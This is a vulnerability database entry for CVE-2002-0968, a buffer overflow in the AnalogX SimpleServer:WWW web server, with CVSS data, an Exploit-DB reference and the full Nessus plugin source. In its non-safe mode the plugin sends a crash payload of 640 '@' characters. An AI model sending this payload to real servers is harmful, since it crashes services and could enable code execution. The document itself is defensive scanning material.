Vulnerabilities > CVE-2002-0968 - Buffer Overflow vulnerability in AnalogX SimpleServer:WWW Web Server

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
analogx
nessus
exploit available

Summary

Buffer overflow in AnalogX SimpleServer:WWW 1.16 and earlier allows remote attackers to cause a denial of service (crash) and execute code via a long HTTP request method name.

Exploit-Db

descriptionAnalogX SimpleServer:WWW 1.16 Web Server Buffer Overflow Vulnerability. CVE-2002-0968. Remote exploit for windows platform
idEDB-ID:21542
last seen2016-02-02
modified2002-06-13
published2002-06-13
reporterAuriemma Luigi
sourcehttps://www.exploit-db.com/download/21542/
titleAnalogX SimpleServer:WWW 1.16 Web Server Buffer Overflow Vulnerability

Nessus

NASL familyWeb Servers
NASL idSIMPLESERVERWWW_DOS.NASL
descriptionThe remote installation of AnalogX SimpleServer:WWW is affected by a buffer overflow triggered when processing input, such as a series of 640
last seen2020-06-01
modified2020-06-02
plugin id11035
published2002-06-30
reporterThis script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11035
titleAnalogX SimpleServer:WWW Buffer Overflow
code
#
# (C) Tenable Network Security, Inc.
#

# Rerefence:
# To: [email protected]
# From:"Fort _" <[email protected]>
# Subject: Remote DoS in AnalogX SimpleServer:www 1.16
# Message-ID: <[email protected]>

include("compat.inc");

if(description)
{
 script_id(11035);
 script_version("1.27");

 script_cve_id("CVE-2002-0968");
 script_bugtraq_id(5006);

 script_name(english:"AnalogX SimpleServer:WWW Buffer Overflow");
 script_summary(english:"Crashes SimpleServer:WWW");
 
 script_set_attribute(
  attribute:"synopsis",
  value:"The remote web server is vulnerable to a buffer overflow attack."
 );
 script_set_attribute( attribute:"description", value:
"The remote installation of AnalogX SimpleServer:WWW is affected by a
buffer overflow triggered when processing input, such as a series of
640 '@' characters.  An unauthenticated, remote attacker can leverage
this issue to crash the affected service or even to execute arbitrary
code on the remote host." );
 script_set_attribute(attribute:"see_also", 
  value:"https://seclists.org/bugtraq/2002/Jun/112"
 );
 script_set_attribute(
  attribute:"see_also", 
  value:"https://seclists.org/bugtraq/2002/Jul/13"
 );
 script_set_attribute(
  attribute:"solution", 
  value:"Upgrade to version 1.23 or later as that reportedly fixes the issue."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2002/06/30");
 script_set_attribute(attribute:"vuln_publication_date", value: "2002/06/13");
 script_cvs_date("Date: 2018/11/15 20:50:25");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
 script_category(ACT_MIXED_ATTACK);
 
 script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");
 script_family(english:"Web Servers");

 script_dependencies("http_version.nasl");
 script_require_ports("Services/www", 80);
 script_require_keys("www/simpleserver");
 exit(0);
}

# The script code starts here

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80, embedded: 0);

banner = get_http_banner(port: port);
if (! banner) exit(0);

if (!egrep(pattern:"^Server: *SimpleServer:WWW/", string:banner)) exit(0);


if (safe_checks())
{
  if (egrep(pattern:"^Server: *SimpleServer:WWW/1.[01]([^0-9]|$)", string:banner))
  {
    server = strstr(banner, "Server:");
    server = server - strstr(server, '\r\n');

    report = string(
      "\n",
      "Nessus made this determination based on the version in the following\n",
      "Server response header :\n",
      "\n",
      "  ", server, "\n"
    );
    security_hole(port:port, extra:report);
  }
  exit(0);
}

if (http_is_dead(port: port)) exit(1, "The web server is dead");

w = http_send_recv_buf(port: port, 
  data:string(crap(length:640, data:"@"), "\r\n\r\n"));

if (http_is_dead(port: port)) security_hole(port);